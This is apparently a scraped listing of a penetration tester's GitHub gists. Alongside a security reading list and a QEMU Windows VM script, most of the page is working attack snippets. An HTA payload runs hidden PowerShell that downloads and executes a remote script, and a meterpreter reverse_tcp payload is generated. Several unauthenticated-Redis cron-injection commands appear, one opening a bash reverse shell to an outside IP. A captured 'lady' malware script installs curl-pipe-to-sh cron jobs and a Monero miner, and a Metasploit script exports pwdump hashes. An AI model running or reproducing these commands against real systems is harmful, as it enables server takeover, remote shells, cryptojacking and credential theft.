View gist:606c41ac6ec40bf5c69d4db96d9312e3
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
View windows10qemu.sh
# Installing
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View gist:93a9a8fa20acd0d62d0343b438710db8
root@weisuo.org:~# cat hta-psh.txt
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK
#msfconsole
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#cat 1.ps1
View gist:b5e8ae7a489207c58f54cfaa7b37718d
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
* * * * * sleep 10;/bin/sh /tmp/zz
View gist:5a9578a66484435b9685e03a27c9d3fc
redis-cli flushall
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
redis-cli set c whoami
from https://phpinfo.me/2016/07/07/1275.html
View gist:01963c7a36235e90c11ef8756e76d3d5
redis-cli flushall # 为了方便测试
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
View gist:df7082a56f1d7bc9681ceb3fea65c0fe
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
from https://phpinfo.me/2016/07/07/1275.html
View redis-noauth-lady-hack.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
View export_workspaces.rb
<ruby>
File.open("/root/workspaces.txt", "r") do |f|
f.each_line do |line|
run_single("workspace #{line}")
run_single("db_export -f xml -a /root/msf_workspace_export/#{line}_export_13Aug2016.xml")
run_single("db_export -f pwdump -a /root/msf_workspace_export/#{line}_export_13Aug2016.pwdump")
end
end
</ruby>